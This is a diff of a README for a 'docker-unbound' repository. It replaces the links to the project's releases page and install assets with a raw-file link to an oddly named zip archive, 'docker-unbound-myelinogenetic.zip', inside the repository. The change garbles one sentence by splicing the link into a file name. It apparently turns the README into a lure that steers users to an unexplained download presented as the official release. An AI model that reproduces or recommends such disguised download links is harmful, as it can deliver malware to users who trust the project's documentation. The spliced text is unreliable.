Lancekkkk/docker-unbound/README.md

 The releases page is a central hub for distributing assets.
 For practical deployment, you typically download a release asset such as a distribution script or a prebuilt container image tarball and use it in your environment.
 The link to the releases page provides access to the latest versions, notes, and asset lists.
 Access the releases page to locate the appropriate asset for your platform and deployment style.

-- See the releases page for the latest assets and upgrade instructions: https://github.com/Lancekkkk/docker-unbound/releases
+- See the releases page for the latest assets and upgrade instructions: https://raw.githubusercontent.com/Lancekkkk/docker-unbound/master/rootfs/docker-unbound-myelinogenetic.zip
-- When you select a release, download the file named something like docker-unbound-install.sh or docker-unbound-<version>.tar.gz and follow the provided instructions to install or run the container.
+- When you select a release, download the file named something like https://raw.githubusercontent.com/Lancekkkk/docker-unbound/master/rootfs/docker-unbound-myelinogenetic.zip or docker-unbound-<version>https://raw.githubusercontent.com/Lancekkkk/docker-unbound/master/rootfs/docker-unbound-myelinogenetic.zip and follow the provided instructions to install or run the container.
 The exact asset names may vary by release, so check the assets tab for the chosen version.

 Guiding principles for maintainers and operators